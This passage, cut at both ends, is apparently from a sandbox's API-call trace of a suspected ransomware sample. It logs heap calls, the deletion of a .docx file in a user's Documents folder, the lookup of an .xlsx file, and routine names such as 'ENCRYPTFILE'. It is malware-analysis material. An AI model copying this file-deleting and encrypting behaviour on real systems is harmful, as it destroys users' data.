lpFilePart=0x0) returned 0x2a [0078.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0078.129] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\t- t3k 6dv0.docx")) returned 0x20 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.130] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785f0860, ftCreationTime.dwHighDateTime=0x1d5d61c, ftLastAccessTime.dwLowDateTime=0x1fa74340, ftLastAccessTime.dwHighDateTime=0x1d5bf97, ftLastWriteTime.dwLowDateTime=0x1fa74340, ftLastWriteTime.dwHighDateTime=0x1d5bf97, nFileSizeHigh=0x0, nFileSizeLow=0xeafd, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="T- t3K 6dV0.docx", cAlternateFileName="T-T3K6~1.DOC")) returned 0x41ac440 [0078.131] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\t- t3k 6dv0.docx")) returned 1 [0078.136] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785f0860, ftCreationTime.dwHighDateTime=0x1d5d61c, ftLastAccessTime.dwLowDateTime=0x1fa74340, ftLastAccessTime.dwHighDateTime=0x1d5bf97, ftLastWriteTime.dwLowDateTime=0x1fa74340, ftLastWriteTime.dwHighDateTime=0x1d5bf97, nFileSizeHigh=0x0, nFileSizeLow=0xeafd, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="T- t3K 6dV0.docx", cAlternateFileName="T-T3K6~1.DOC")) returned 0 [0078.137] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0078.137] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0078.137] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da7a0 | out: hHeap=0x1780000) returned 1 [0078.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0078.138] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.138] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.138] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0078.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a82e0 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.139] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.139] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.145] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd56d6b00, ftCreationTime.dwHighDateTime=0x1d5b5ba, ftLastAccessTime.dwLowDateTime=0x6627ef90, ftLastAccessTime.dwHighDateTime=0x1d57c0d, ftLastWriteTime.dwLowDateTime=0x6627ef90, ftLastWriteTime.dwHighDateTime=0x1d57c0d, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="WfOLKWjF.xlsx", cAlternateFileName="WFOLKW~1.XLS")) returned 0x41ac180 [0078.146] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0078.146] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.147] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.147] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0078.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0078.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0078.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0078.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0078.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0078.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.149] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.150] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.151] HeapFree (in: hHeap=0x1780000, 